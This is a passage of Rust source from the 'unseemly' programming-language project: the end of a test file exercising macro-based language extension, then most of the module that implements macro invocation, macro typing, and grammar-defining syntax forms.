eight)]'")); } // // We need tuple literals before we can test this: // assert_m!(assign_variable("let-multi", // "forall T . .[ binder : **[ :::[T >> Ident<T> ]::: ]** // type : **[ :::[T >> Type<T> ]::: ]** // rhs : **[ :::[T >> Expr<T> ]::: ]** // body : Expr<S> . // '[Expr | (.[ ...[, binder , >> ,[Ident | binder],]... // : ...[, type , >> ,[Type | type], ]... . // ,[body], ]. // ...[, Expr , | ,[rhs], ]... ) ]' // "), // Ok(_)); // without_freshening! { // assert_eq!( // eval_unseemly_program( // "(let-multi '[Ident<Int> | y]' // '[Type<Int> | Int]' // '[Expr<Int> | eight]' // '[Expr<Int> | five]')"), // eval_unseemly_program("'[Expr<Int> | (.[x : Int . match x {y => five}]. eight)]'")); // } } #[test] fn simple_end_to_end_eval() { assert_eq!(eval_unseemly_program_top("(zero? zero)"), Ok(val!(b true))); assert_eq!(eval_unseemly_program_top("(plus one one)"), Ok(val!(i 2))); assert_eq!( eval_unseemly_program_top("(.[x : Int y : Int . (plus x y)]. one one)"), Ok(val!(i 2)) ); assert_eq!( eval_unseemly_program_top( "((fix .[ again : [ -> [ Int -> Int ]] . .[ n : Int . match (zero? n) { +[True]+ => one +[False]+ => (times n ((again) (minus n one))) } ]. ].) five)" ), Ok(val!(i 120)) ); } #[test] fn end_to_end_quotation_basic() { assert_m!(eval_unseemly_program_top("'[Expr | .[ x : Int . x ]. ]'"), Ok(_)); assert_m!(eval_unseemly_program_top("'[Expr | (plus five five) ]'"), Ok(_)); assert_m!(eval_unseemly_program_top("'[Expr | '[Expr | (plus five five) ]' ]'"), Ok(_)); //≫ .[s : Expr<Int> . '[Expr | ( ,[Expr | s], '[Expr | ,[Expr | s], ]')]' ]. } #[test] fn language_building() { assert_eq!( eval_unseemly_program_top( r"extend_syntax DefaultSeparator ::= /((?:\s|#[^\n]*)*)/ ; in # Now we have comments! (just not after the last token) five" ), Ok(val!(i 5)) ); let bound_wrong_prog = "extend_syntax Expr ::=also forall T S . 
'{ [ lit ,{ DefaultToken }, = 'let' [ pat := ( ,{ Pat<S> }, ) lit ,{ DefaultToken }, = '=' value := ( ,{ Expr<S> }, ) lit ,{ DefaultToken }, = ';' ] * lit ,{ DefaultToken }, = 'in' body := ( ,{ Expr<T> }, <-- ...[pat = value]... ) ] }' let_macro -> .{ '[Expr | match ...[,value, >> ,[value], ]... { ...[,pat, >> ,[pat],]... => ,[body], } ]' }. ; in let x = eight ; y = times ; in (plus x y)"; let bound_wrong_ast = grammar::parse( &core_forms::outermost_form(), core_forms::outermost__parse_context(), bound_wrong_prog, ) .unwrap(); assert_m!( ty::synth_type(&bound_wrong_ast, crate::runtime::core_values::core_types()), ty_err_p!(Mismatch(x, y)) => { assert_eq!(x, uty!({Int :})); assert_eq!(y, uty!({fn : [{Int :}; {Int :}] {Int :}})); } ); let inner_expr_wrong_prog = "extend_syntax Expr ::=also forall T S . '{ [ lit ,{ DefaultToken }, = 'let' [ pat := ( ,{ Pat<S> }, ) lit ,{ DefaultToken }, = '=' value := ( ,{ Expr<S> }, ) lit ,{ DefaultToken }, = ';' ] * lit ,{ DefaultToken }, = 'in' body := ( ,{ Expr< T > }, <-- ...[pat = value]... ) ] }' let_macro -> .{ '[Expr | match ...[,value, >> ,[value], ]... { ...[,pat, >> ,[pat],]... => ,[body], } ]' }. ; in let x = eight ; y = four ; in (plus x times)"; let inner_expr_wrong_ast = grammar::parse( &core_forms::outermost_form(), core_forms::outermost__parse_context(), inner_expr_wrong_prog, ) .unwrap(); assert_m!( ty::synth_type(&inner_expr_wrong_ast, crate::runtime::core_values::core_types()), ty_err_p!(Mismatch(x, times)) => { assert_eq!(x, uty!({Int :})); assert_eq!(times, uty!({fn : [{Int :}; {Int :}] {Int :}})); } ); // TODO: leaving out the `**[ ]**` results in an ICP; it should be a static error. let let_macro_prog = "extend_syntax Expr ::=also forall T S . '{ [ lit ,{ DefaultToken }, = 'let' [ pat := ( ,{ Pat<S> }, ) lit ,{ DefaultToken }, = '=' value := ( ,{ Expr<S> }, ) lit ,{ DefaultToken }, = ';' ] * lit ,{ DefaultToken }, = 'in' body := ( ,{ Expr<T> }, <-- ...[pat = value]... 
) ] }' let_macro -> .{ '[Expr | match **[...[,value, >> ,[value], ]... ]** { **[...[,pat, >> ,[pat],]... ]** => ,[body], } ]' }. ; in let x = eight ; y = four ; in (plus y (plus x y))"; assert_eq!(eval_unseemly_program_top(let_macro_prog), Ok(val!(i 16))); } #[test] fn for_loop__macro() { // For whatever reason, this program uncovered a bunch of bugs. assert_eq!( eval_unseemly_program_top( r" extend_syntax Expr ::=also forall T S . '{ [ lit ,{ DefaultToken }, = 'let' [ pat := ( ,{ Pat<S> }, ) lit ,{ DefaultToken }, = '=' val := ( ,{ Expr<S> }, ) lit ,{ DefaultToken }, = ';' ] * lit ,{ DefaultToken }, = 'in' body := ( ,{ Expr<T> }, <-- ...[pat = val]... ) ] }' let_macro -> .{ '[Expr | match **[...[,val, >> ,[val], ]... ]** { **[...[,pat, >> ,[pat],]... ]** => ,[body], } ]' }. ; in extend_syntax Expr ::=also forall T . '{ [ lit ,{ DefaultToken }, = 'for' pat := ( ,{ Pat<T> }, ) lit ,{ DefaultToken }, = 'in' seq := ( ,{ Expr<Sequence<T>> }, ) body := ( ,{ Expr<Unit> }, <-- pat : T ) ] }' for_loop -> .{ '[Expr | (foldl ,[seq], **[]** .[unit : Unit arg : ,[prefab_type T], . let ,[pat], = arg ; in ,[body], ]. ) ]' }. ; in let foo = seven ; in for x in (range one three) (print (anything_to_string x))" ), // TODO: When subtyping has been improved, this should work: // `for x in (range one three) (print (anything_to_string (plus one x)))` Ok(val!(seq)) ); }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/core_macro_forms.rs
src/core_macro_forms.rs
use crate::{ ast, ast::Ast, ast_walk::{ LazyWalkReses, WalkRule::{Body, LiteralLike, NotWalked}, }, beta::{Beta, Beta::*, ExportBeta}, core_forms::{strip_ee, strip_ql}, core_type_forms::{less_quoted_ty, more_quoted_ty}, form::{EitherPN::*, Form}, grammar::{ FormPat::{self, *}, SynEnv, }, name::*, runtime::{eval::Eval, reify::Reifiable}, ty::SynthTy, util::assoc::Assoc, walk_mode::WalkElt, }; use std::rc::Rc; // Macros! // // Macro expansion happens after typechecking. Macro expansion happens after typechecking. // You'd think I'd remember that better, what with that being the whole point of Unseemly, but nope. // Here's how macros work: // The programmer writes a macro definition, e.g.: // // extend_syntax macro // Expr ::=also // forall T . '{ (lit if) ,{Expr<Bool> | cond}, // (lit then) ,{Expr<T> | then_e}, // (lit else) ,{Expr<T> | else_e}, }' // conditional -> // '[Expr | match ,[cond], { // +[True]+ => ,[then_e], // +[False]+ => ,[else_e], } ]' // in // if (zero? five) then three else eight // // The parser parses the `if` as a macro invocation, but doesn't lose the '{…}'! // It spits out an `Ast` in which the `extend` binds `conditional` and `if ⋯` references it. // Under the hood, `conditional` has the type // `∀ T . [ *[ cond : Expr<Bool> then : Expr<T> else : Expr<T> -> Expr<T> ]* ] // ... even though it's a macro, not a function. (A kind-checker is needed here!) // // Everything is typechecked (including the `.{ ⋯ }.` implementation and the invocation). // The macro name (`conditional`) is a bit of a hack // The syntax extension is typechecked, much like a function definition is. // (`cond`, `then_e`, and `else_e` are assumed to be their respective types, // and the macro is shown to produce an `Expr<T>`.) // So is the invocation, which subtypes away the `T`, checks its arguments, and produces `T`. // // Macro expansion evaluates the macro with its arguments, `(zero? five)`, `three`, and `eight`, // producing a match statement. 
// // Finally, phase-0 evaluation produces a result of `8`! // It's best to read this file in the voice of the /Pushing Daisies/ narrator. // This macro is a helper for generating `FormPat`-generating syntactic forms. macro_rules! syntax_syntax { // atomic FormPat (( $($gram:tt)* ) $syntax_name:ident ) => { Rc::new(Form { name: n(&stringify!($syntax_name).to_lowercase()), grammar: Rc::new(form_pat!( $($gram)* )), type_compare: Both(NotWalked,NotWalked), // Not a type // Binds nothing synth_type: Both(NotWalked, cust_rc_box!(|_parts| { Ok(Assoc::new())}) ), eval: Positive(cust_rc_box!(|_parts| { Ok($syntax_name.reify())} )), quasiquote: Both(LiteralLike, LiteralLike) }) }; // FormPat with arguments (( $($gram:tt)* ) $syntax_name:ident ( $($arg:ident => $e:expr),* ) ) => { Rc::new(Form { name: n(&stringify!($syntax_name).to_lowercase()), grammar: Rc::new(form_pat!( $($gram)* )), type_compare: Both(NotWalked,NotWalked), // Not a type synth_type: Negative(cust_rc_box!(|parts| { let mut out = Assoc::<Name, Ast>::new(); $( out = out.set_assoc(&parts.get_res(n(&stringify!($arg)))?); )* Ok(out) })), eval: Positive(cust_rc_box!(|parts| { Ok($syntax_name( $( { let $arg = parts.get_res(n(&stringify!($arg)))?; $e } ),* ).reify())} )), quasiquote: Both(LiteralLike, LiteralLike) }) }; // FormPat with arguments, and just doing `get_res` on everything doesn't work: (( $($gram:tt)* ) $syntax_name:ident { $type:expr } { $eval:expr }) => { Rc::new(Form { name: n(&stringify!($syntax_name).to_lowercase()), grammar: Rc::new(form_pat!( $($gram)* )), type_compare: Both(NotWalked,NotWalked), // Not a type synth_type: Negative(cust_rc_box!( $type )), // Produces a typed value eval: Positive(cust_rc_box!( $eval )), quasiquote: Both(LiteralLike, LiteralLike) }) }; } // Macros have types! // ...but they're not higher-order (i.e., you can't do anything with a macro other than invoke it). // This means that we can just generate a type for them at the location of invocation. 
fn macro_type(forall_ty_vars: &[Name], arguments: Vec<(Name, Ast)>, output: Ast) -> Ast { let mut components = vec![]; for (k, v) in arguments.iter() { // The fields in a struct type are not renamed like normal during freshening, // so roll back any freshening that happened during evaluation, hence `unhygienic_orig`. // TODO: this can go wrong if a macro-defining macro collides two term names. // Fixing this probably requires rethinking how "component_name" works. // Perhaps not using structs at all might also work. components.push(mbe!("component_name" => (, ast!(k.unhygienic_orig())), "component" => (, v.to_ast()))); } let argument_struct = raw_ast!(Node( crate::core_forms::find_core_form("Type", "struct"), crate::util::mbe::EnvMBE::new_from_anon_repeat(components), ExportBeta::Nothing )); let mac_fn = u!({Type fn : [(, argument_struct)] (, output.to_ast())}); if forall_ty_vars.is_empty() { mac_fn } else { ast!({"Type" "forall_type" : "body" => (import [* [forall "param"]] (, mac_fn)), "param" => (,seq forall_ty_vars.iter().map(|n: &Name| { ast!(*n) }).collect::<Vec<_>>()) }) } } fn type_macro_invocation( parts: &LazyWalkReses<SynthTy>, expected_return: Ast, grammar: &FormPat, ) -> Result<Assoc<Name, Ast>, crate::ty::TypeError> { // Typecheck the subterms, and then quote them: let mut q_arguments = vec![]; // We need the macro's type vars to be usable in betas // (which is a little weird, but looks fine (see `for` in `build_a_language.unseemly`)). // So, we bind those names as terms referring to the environment, // and put them in the environment as if 'forall'ed. // Can't use `node_let!` because "macro_type_params" is a `trivial_form`. 
let macro__type_params = parts.get_term(n("macro__type_params")); let mut new_terms = parts.parts.clone(); let mut new_env = parts.env.clone(); let mut ty_vars = vec![]; for param in macro__type_params.node_parts().get_rep_leaf_or_panic(n("params")) { let param = param.to_name(); new_terms.add_leaf( param, crate::ast_walk::LazilyWalkedTerm::new(&raw_ast!(VariableReference(param))), ); new_env = new_env.set(param, raw_ast!(VariableReference(param))); ty_vars.push(param); } let parts = LazyWalkReses { parts: new_terms, env: new_env, ..parts.clone() }; for (binder, depth) in grammar.binders() { // Things like `token := (/some_stuff/)` are well-typed in all invocations; // examine things like `token := (,{Expr<T>},) let term_ty = if let Some(nt) = grammar.find_named_call(binder) { // For example, `body := (,{Expr<T>},)` if crate::core_type_forms::nt_is_positive(nt) { parts.flatten_res_at_depth( binder, depth, &|ty: Ast| more_quoted_ty(&ty, nt), &|ty_vec: Vec<Ast>| ast!({"Type" "tuple" : "component" => (,seq ty_vec) }), )? } else { parts.flatten_generate_at_depth( binder, depth, &|| crate::ty_compare::Subtype::underspecified(binder), &|ty_vec: Vec<Ast>| ast!({"Type" "tuple" : "component" => (,seq ty_vec) }), ) } } else { // For example, `token := /(foo)/`. // HACK: currently this is the only other type possible, // but if multiple ones become available, figuring out the right one is tricky. // (and ∀ T. T doesn't work: it's the opposite of what we want!) ast!({"Type" "Ident" :}) }; q_arguments.push((binder, term_ty)); } // This is lifted almost verbatim from "Expr" "apply". Maybe they should be unified? 
use crate::walk_mode::WalkMode; let _ = crate::ty_compare::is_subtype( &macro_type(&ty_vars, q_arguments.clone(), expected_return), &parts.get_res(n("macro_name"))?, &parts, ) .map_err(|e| crate::util::err::sp(e, parts.this_ast.clone()))?; // TODO: `Assoc` should implement `From<Vec<(K,V)>>` let mut res = Assoc::new(); for (k, v) in q_arguments { res = res.set(k, v.clone()) } Ok(res) } // This will be called at parse-time to generate the `Ast` for a macro invocation. // The form it emits is analogous to the "Expr" "apply" form. // Public for use in `expand.rs` tests. pub fn macro_invocation( grammar: FormPat, macro_name: Name, ty_params: Vec<Ast>, implementation: crate::runtime::eval::Closure, export_names: Vec<Name>, ) -> Rc<Form> { use crate::{ty_compare, walk_mode::WalkMode}; let impl_prefab = crate::runtime::eval::Value::Function(Rc::new(implementation)).prefab(); let grammar1 = grammar.clone(); let grammar2 = grammar.clone(); let trivial_form = crate::core_type_forms::type_defn("unused", form_pat!((impossible))); let params_holder = ast!({trivial_form ; "params" => (,seq ty_params)}); Rc::new(Form { name: n("macro_invocation"), // TODO: maybe generate a fresh name? grammar: Rc::new(form_pat!([ // `type_macro_invocation` expect these two to be set (named "macro__type_params", (anyways (, params_holder))), (named "macro_name", (anyways (vr macro_name))), // Capture this here so that its environmental names get freshened properly. // Need to store this one phase unquoted. (named "impl", (-- 1 (anyways (,impl_prefab)))), (, grammar.clone()) ])), type_compare: Both(NotWalked, NotWalked), // Invoked at typechecking time. // The macro_name part will be bound to a type of the form // ∀ T . [*[x : Nt<T> ⋯ ]* -> Nt<T>] // ... 
which you can imagine is the type of the implementation of the macro synth_type: Both( cust_rc_box!(move |parts| { let return_type = ty_compare::Subtype::underspecified(n("<return_type>")); let _ = type_macro_invocation(&parts, return_type.clone(), &grammar1)?; // What return type made that work? let q_result = ty_compare::unification.with(|unif| { let resolved = ty_compare::resolve( crate::ast_walk::Clo { it: return_type, env: parts.env.clone() }, &unif.borrow(), ); // Canonicalize the type in its environment: let resolved = ty_compare::canonicalize(&resolved.it, resolved.env); resolved.map_err(|e| crate::util::err::sp(e, parts.this_ast.clone())) })?; less_quoted_ty(&q_result, Some(n("Expr")), &parts.this_ast) }), cust_rc_box!(move |parts| { // From the macro's point of view, its parts are all positive; // they all produce (well, expand to), rather than consume, syntax. let parts_positive = parts.switch_mode::<SynthTy>(); let expected_return_type = more_quoted_ty(parts.context_elt(), n("Pat")); let arguments = type_macro_invocation(&parts_positive, expected_return_type, &grammar2)?; // What argument types made that work? let mut res: Assoc<Name, Ast> = Assoc::new(); ty_compare::unification.with(|unif| { for binder in &export_names { let ty = arguments.find_or_panic(binder); let binder_clo = ty_compare::resolve( crate::ast_walk::Clo { it: ty.clone(), env: parts.env.clone() }, &unif.borrow(), ); let binder_ty = ty_compare::canonicalize(&binder_clo.it, binder_clo.env) .map_err(|e| crate::util::err::sp(e, parts.this_ast.clone()))?; for (ty_n, ty) in parts.with_context(binder_ty).get_res(*binder)?.iter_pairs() { res = res .set(*ty_n, less_quoted_ty(ty, Some(n("Pat")), &parts.this_ast)?); } } Ok(res) }) }), ), // Kind of a HACK, but we re-use `eval` instead of having a separate field. // (maybe this should be a special case in the walk lookup instead?) eval: Positive(cust_rc_box!(move |parts| { use crate::runtime::eval::Value; // This code is like that for "apply". 
let mut env = parts.env.clone(); for (param, depth) in &grammar.binders() { let nt = grammar.find_named_call(*param); if nt != Some(n("DefaultAtom")) && nt != Some(n("Ident")) { // TODO: why not for those two NTs? let rhs = parts.map_flatten_term_at_depth( *param, *depth, &|mut a: &Ast| { // Nuke all binding, since we're abandoning its context. // The user will† deposit this syntax inside a replacement binding form. // (†still not enforced until issue #31 is fixed) while let ast::ExtendEnv(ref body, _) | ast::ExtendEnvPhaseless(ref body, _) = a.c() { a = &*body; } Value::from_ast(a) }, &|vec: Vec<Value>| Value::Sequence(vec.into_iter().map(Rc::new).collect()), ); env = env.set(*param, rhs); } } let impl_val = crate::runtime::eval::eval( crate::core_forms::strip_ql(parts.get_term_ref(n("impl"))), assoc_n!(), )?; let impl_clos = match &impl_val { Value::Function(clos) => clos, _ => icp!(), }; let expanded = Ast::reflect(&crate::runtime::eval::eval(&impl_clos.body, env)?); // Expand any macros produced by expansion, or that were already present in subterms: Ok(crate::expand::expand(&expanded)?.reify()) })), quasiquote: Both(LiteralLike, LiteralLike), }) } /// What should `t` be, if matched under a repetition? /// A tuple, driven by whatever names are `forall`ed in `env`. fn repeated_type(t: &Ast, env: &Assoc<Name, Ast>) -> Result<Ast, crate::ty::TypeError> { let mut drivers = vec![]; for v in t.free_vrs() { if env.find(&v).map(|a| a.c()) == Some(&ast::VariableReference(v)) { drivers.push(env.find_or_panic(&v).clone()); } } if drivers.is_empty() { // TODO: this is just a tuple where every element has the same type... // ...but how do we constrain the length? 
ty_err!(NeedsDriver (()) at t); } Ok(ast!({"Type" "tuple" : "component" => (,seq vec![ast!({"Type" "dotdotdot_type" : "driver" => (,seq drivers), "body" => (, t.clone()) })])})) } pub fn make_core_macro_forms() -> SynEnv { let trivial_type_form = crate::core_type_forms::type_defn("unused", form_pat!((impossible))); let beta_grammar = forms_to_form_pat_export![ syntax_syntax!( ((lit "nothing")) Nothing ) => [], syntax_syntax!( ([(named "name", (call "DefaultReference")), (lit ":"), (named "type", (call "DefaultReference"))]) Basic { |_| icp!("Betas are not typed") } { |parts| { Ok(Basic(parts.get_term(n("name")).vr_to_name(), parts.get_term(n("type")).vr_to_name()).reify()) } }) => [], syntax_syntax!( ([(named "name", (call "DefaultReference")), (lit "="), (named "type", (call "Type"))]) SameAs { |_| icp!("Betas are not typed") } { |parts| { Ok(SameAs(parts.get_term(n("name")).vr_to_name(), Box::new(parts.get_term(n("type")))).reify()) } }) => [], syntax_syntax!( ([(lit "prot"), (named "name", (call "DefaultReference"))]) Protected { |_| icp!("Betas are not typed") } { |parts| { Ok(Protected(parts.get_term(n("name")).vr_to_name()).reify()) } }) => [], syntax_syntax!( ([(lit "forall"), (named "name", (call "DefaultReference"))]) Underspecified { |_| icp!("Betas are not typed") } { |parts| { Ok(Underspecified(parts.get_term(n("name")).vr_to_name()).reify()) } }) => [], syntax_syntax!( ((delim "...[", "[", (named "sub", (call "Beta")))) ShadowAll { |_| icp!("Betas are not typed") } { |parts| { let sub = Beta::reflect(&parts.get_res(n("sub"))?); let drivers = sub.names_mentioned(); Ok(ShadowAll(Box::new(sub), drivers).reify()) } }) => [], syntax_syntax!( ((delim "[", "[", [(named "over", (call "Beta")), (lit "o>"), (named "under", (call "Beta"))])) Shadow { |_| icp!("Betas are not typed") } { |parts| { Ok(Beta::Shadow( Box::new(Beta::reflect(&parts.get_res(n("over"))?)), Box::new(Beta::reflect(&parts.get_res(n("under"))?))).reify()) } }) => [] ]; let 
capture_language_form = typed_form!("capture_language", (extend_nt [(lit "capture_language")], "OnlyNt", crate::core_extra_forms::extend__capture_language), Body(n("body")), Body(n("body"))); // Most of "Syntax" is a negative walk (because it produces an environment), // but lacking a `negative_ret_val`. let grammar_grammar = forms_to_form_pat_export![ syntax_syntax!( ( (delim "anyways{", "{", (named "body", (call "Expr"))) ) Anyways ( body => Ast::reflect(&body) )) => ["body"], // HACK: expanding to `'[Expr| capture_language]'` doesn't do what you want, so do this: Rc::new(Form { name: n("capture_language_form"), grammar: Rc::new(form_pat!( (lit "capture_language_form") )), type_compare: Both(NotWalked, NotWalked), synth_type: Negative(cust_rc_box!(|_| Ok(Assoc::new()))), eval: Positive(cust_rc_box!(move |_| { Ok(FormPat::Scope(capture_language_form.clone(), crate::beta::ExportBeta::Nothing).reify()) })), quasiquote: Both(LiteralLike, LiteralLike) }) => [], syntax_syntax!( ((lit "impossible")) Impossible ) => [], syntax_syntax!( ([(named "body", (call "Syntax")), (lit "reserving"), (star (named "words", (scan r"\s*'((?:[^'\\]|\\'|\\\\)*)'"))) ]) Reserved { |parts| { parts.get_res(n("body")) } } { |parts| { Ok(Reserved(Rc::new(FormPat::reflect(&parts.get_res(n("body"))?)), parts.get_rep_term(n("words")).iter().map(Ast::to_name).collect::<Vec<_>>() ).reify()) } }) => ["body"], syntax_syntax!( ( // TODO: this might have to be both positive and negative [(lit "lit"), (named "body", (call "Syntax")), // Allow \\ and \' as escapes: (lit "="), (named "expected", (scan r"\s*'((?:[^'\\]|\\'|\\\\)*)'"))]) Literal { |parts| { parts.get_res(n("body")) } } { |parts| { let literal = parts.get_term(n("expected")).to_name().orig_sp() .replace(r#"\'"#, r#"'"#).replace(r#"\\"#, r#"\"#); Ok(FormPat::Literal(Rc::new(FormPat::reflect(&parts.get_res(n("body"))?)), n(&literal)).reify()) } }) => [], syntax_syntax!( ([(lit "vr"), (delim "(", "(", (named "body", (call "Syntax")))]) VarRef 
( body => Rc::new(FormPat::reflect(&body)) )) => [], // TODO: split out a separate SyntaxSeq, so that we can get rid of the [ ] delimiters syntax_syntax!( ( (delim "[", "[", (star (named "elt", (call "Syntax"))))) Seq { |parts| { let mut out = Assoc::<Name, Ast>::new(); for sub in &parts.get_rep_res(n("elt"))? { out = out.set_assoc(sub); } Ok(out) } } { |parts| { Ok(Seq(parts.get_rep_res(n("elt"))?.iter().map(|val| { Rc::new(FormPat::reflect(val)) }).collect()).reify()) } }) => [* ["elt"]], syntax_syntax!( ([(named "body", (call "Syntax")), (lit "*")]) Star { |parts| { let body : Assoc<Name, Ast> = parts.get_res(n("body"))?; body.map(|t| repeated_type(t, &parts.env)).lift_result() } } { |parts| { Ok(Star(Rc::new(FormPat::reflect(&parts.get_res(n("body"))?))).reify()) } }) => ["body"], syntax_syntax!( ([(named "body", (call "Syntax")), (lit "+")]) Plus { |parts| { let body : Assoc<Name, Ast> = parts.get_res(n("body"))?; body.map(|t| repeated_type(t, &parts.env)).lift_result() } } { |parts| { Ok(Plus(Rc::new(FormPat::reflect(&parts.get_res(n("body"))?))).reify()) } }) => ["body"], // TODO: support seprators, and add a separator here syntax_syntax!( ( (delim "alt[", "[", (star [(named "elt", (call "Syntax"))]))) Alt { |parts| { let mut out = Assoc::<Name, Ast>::new(); for sub in &parts.get_rep_res(n("elt"))? { out = out.set_assoc(sub); } Ok(out) } } { |parts| { Ok(Alt(parts.get_rep_res(n("elt"))?.iter().map(|val| { Rc::new(FormPat::reflect(val)) }).collect()).reify()) } }) => [* ["elt"]], syntax_syntax!( ([(named "plan_a", (call "Syntax")), (delim "or{", "{", (named "plan_b", (call "Syntax"))) ]) Biased ( plan_a => Rc::new(FormPat::reflect(&plan_a)), plan_b => Rc::new(FormPat::reflect(&plan_b)) )) => ["plan_a" "plan_b"], // `Named` switches to a positive mode for typechecking its body. 
// TODO: I don't think this makes sense, now that `Named` and `Call` are split apart: // TODO: replace `binder` with a `Pat`, and make the following true: // This has to have the same named parts as `unquote`, because it reuses its typechecker // But the type walk (as an overall quotation and locally) is always negative. syntax_syntax!( ([(named "part_name", atom), (lit ":="), (delim "(", "(", (named "body", (call "Syntax")))]) Named { |parts| { let binder = parts.get_term(n("part_name")).to_name(); Ok(Assoc::new().set(binder, parts.switch_mode::<SynthTy>().get_res(n("body"))?)) } } { |parts| { Ok(Named( parts.get_term(n("part_name")).to_name(), Rc::new(FormPat::reflect(&parts.get_res(n("body"))?))).reify()) } }) => ["part_name"], // `Call` without a type syntax_syntax!( ((delim ",{", "{", (named "nt", atom))) Call { |_| { Ok(Assoc::new()) // We should check that the nt is defined, but we can't here } } { |parts| { Ok(Call(parts.get_term(n("nt")).to_name()).reify()) } }) => [], // `Call` with a type is positive (has to be under a `Named`) Rc::new(Form { name: n("call_with_type"), grammar: Rc::new(form_pat!( (delim ",{", "{", [(named "nt", atom), (call "DefaultSeparator"), (scan r"(<)"), (named "ty_annot", (call "Type")), (call "DefaultSeparator"), (scan r"(>)")]))), type_compare: Both(NotWalked,NotWalked), // Not a type synth_type: Both(cust_rc_box!(|parts| { let expected_type = parts.get_res(n("ty_annot"))?; let nt = parts.get_term(n("nt")).to_name(); Ok(more_quoted_ty(&expected_type, nt)) }), NotWalked), eval: Positive(cust_rc_box!(|parts| { let nt = parts.get_term(n("nt")).to_name(); Ok(Rc::new(Call(nt)).reify()) })), quasiquote: Both(LiteralLike, LiteralLike) }) => [], // `Scan` can be positive or negative (may be under a `Named`) Rc::new(Form { name: n("scan"), grammar: Rc::new(form_pat!( [(call "DefaultSeparator"), (named "pat", (scan_cat r"/((?:[^/\\]|\\.)*)/", "string.regexp")), (alt [], [ (lit "as"), (call "DefaultSeparator"), (named "category", (scan 
r"((?:\p{Letter}|[-.])*)"))])])), type_compare: Both(NotWalked,NotWalked), // Not a type synth_type: Both( cust_rc_box!(|_| { Ok(ast!({"Type" "Ident" :})) }), cust_rc_box!(|_| { Ok(Assoc::new()) } )), eval: Positive(cust_rc_box!(|parts| { let regex = parts.get_term(n("pat")).to_name().orig_sp() .replace(r#"\/"#, r#"/"#); Ok(crate::grammar::new_scan( &regex, parts.maybe_get_term(n("category")).map(|a| a.to_name().orig_sp()) ).reify()) })), quasiquote: Both(LiteralLike, LiteralLike) }) => [], // `Common` can be positive or negative (may be under a `Named`) Rc::new(Form { name: n("common"), grammar: Rc::new(form_pat!( [(lit "common"), (delim "(", "(", (named "body", (call "Syntax")))])), type_compare: Both(NotWalked,NotWalked), // Not a type synth_type: Both( cust_rc_box!(|parts| { parts.get_res(n("body")) }), cust_rc_box!(|parts| { parts.get_res(n("body")) })), eval: Positive(cust_rc_box!(|parts| { Ok(Common(Rc::new(FormPat::reflect(&parts.get_res(n("body"))?))).reify()) })), quasiquote: Both(LiteralLike, LiteralLike) }) => ["body"], // `Import` is positive (has to be under a `Named`) Rc::new(Form { name: n("import"), grammar: Rc::new(form_pat!( [(named "body", (call "Syntax")), (lit "<--"), (named "imported", (call "Beta"))])), type_compare: Both(NotWalked,NotWalked), // Not a type synth_type: Both(cust_rc_box!(|parts| { parts.get_res(n("body")) }), cust_rc_box!(|_| panic!("TODO prevent `import`s outside of `named`s"))), eval: Positive(cust_rc_box!(|parts| { Ok(NameImport(Rc::new(FormPat::reflect(&parts.get_res(n("body"))?)), Beta::reflect(&parts.get_res(n("imported"))?)).reify()) })), quasiquote: Both(LiteralLike, LiteralLike) }) => [], // `Pick` is positive (has to be under a `Named`), but its body is negative. 
Rc::new(Form { name: n("pick"), grammar: Rc::new(form_pat!( [(lit "pick"), (named "selection", atom), (lit "in"), (named "body", (call "Syntax"))])), type_compare: Both(NotWalked,NotWalked), // Not a type synth_type: Both(cust_rc_box!(|parts| { let env = parts.switch_to_negative().get_res(n("body"))?; Ok(env.find_or_panic(&parts.get_term(n("selection")).to_name()).clone()) }), cust_rc_box!(|_| panic!("TODO prevent `pick`s outside of `named`s"))), eval: Positive(cust_rc_box!(|parts| { Ok(Pick(Rc::new(FormPat::reflect(&parts.get_res(n("body"))?)), parts.get_term(n("selection")).to_name()).reify()) })), quasiquote: Both(LiteralLike, LiteralLike) }) => [], // TODO: implement syntax for ComputeSyntax // Not sure if `Scope` syntax should be positive or negative. syntax_syntax!( ([(lit "forall"), (star (named "param", atom)), (lit "."), (delim "'{", "{", (named "syntax", (import [unusable "syntax"], (import [* [forall "param"]], (call "Syntax"))))), (named "macro_name", atom), (lit "->"), (delim ".{", "{", (named "implementation", // TODO: `beta!` needs `Shadow` so we can combine these `import`s. // TODO: Why can't these be regular imports, // and why can't the `--` be on the outside? // (Things have to be this way to have the `--` at all.) (import_phaseless [* [forall "param"]], // Arbitrary context element: (import_phaseless ["syntax" == {trivial_type_form ; }], (-- 1 (call "Expr")))))), (alt [], // TODO: needs proper `beta` structure, not just a name list: [(lit "=>"), (star (named "export", atom))])]) Scope { |parts| { let return_ty = parts.switch_mode::<SynthTy>().get_res(n("implementation"))?; let mut arguments : Vec<(Name, Ast)> = parts.get_res(n("syntax"))? 
.iter_pairs().map(|(n, t)| (*n, t.clone())).collect(); arguments.sort_by(|lhs, rhs| lhs.0.cmp(&rhs.0) ); // Pick a canonical order let ty_params = &parts.get_rep_term(n("param")).iter().map(Ast::to_name ).collect::<Vec<_>>(); Ok(Assoc::new().set(parts.get_term(n("macro_name")).to_name(), macro_type(&ty_params, arguments, return_ty))) } } { |parts| { // TODO: This is the right thing to do, right? let macro_params = crate::beta::bound_from_export_beta( &ebeta!(["syntax"]), &parts.this_ast.node_parts(), 0); let implementation = strip_ql(&strip_ee( &strip_ee(&parts.get_term(n("implementation"))))).clone(); let mut export = ExportBeta::Nothing; let export_names = parts.get_rep_term(n("export")).iter() .map(Ast::to_name).collect::<Vec<Name>>(); for name in &export_names {
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
true
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/ast_walk.rs
src/ast_walk.rs
